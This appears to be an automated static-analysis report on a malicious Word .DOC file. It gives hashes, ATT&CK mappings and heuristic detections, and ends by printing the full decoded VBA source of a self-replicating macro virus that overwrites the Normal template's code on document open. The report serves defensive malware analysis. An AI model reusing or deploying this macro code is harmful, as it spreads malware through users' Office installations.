Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 5cf944df60714119…

MALICIOUS

Office (OLE) / .DOC

190.1 KB Created: 2021-04-08 08:08:00 Authoring application: WPS Office_11.1.0.11294_F1E327BC-269C-435d-A152-05C5408002CA First seen: 2026-06-24
MD5: 7add719ce1c455bce5a8e6822f788374 SHA-1: 1b19a48448a4521e512d9755e85d7cf2c2546b86 SHA-256: 5cf944df607141196addde214448fe5f590dc6eafa0ce660af0c7997adbb3dad
168 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic indicates the macro attempts to self-replicate by writing its code to the Normal template. The 'Document_Open' macro is designed to execute upon opening the document, and the script logic suggests it attempts to save the document after modifying the Normal template, potentially establishing persistence. The ClamAV detection name 'Doc.Macro.APMPKILL-6097118-0' is included as an IOC.

Heuristics 5

  • ClamAV: Doc.Macro.APMPKILL-6097118-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.APMPKILL-6097118-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
              .DeleteLines 1, .CountOfLines
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1025 bytes
SHA-256: b6bb40c3324a9a55276682d3a04936515debedc19798cd9b4db60b6bc4ef53ca
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'KILL
   On Error Resume Next
    Set prevDocument = NormalTemplate
    Set prevDocument = ActiveDocument
    Set nextDocument = NormalTemplate
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
          .DeleteLines 1, .CountOfLines
          .InsertLines 1, MyCode
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName
       End If
   End With
End Sub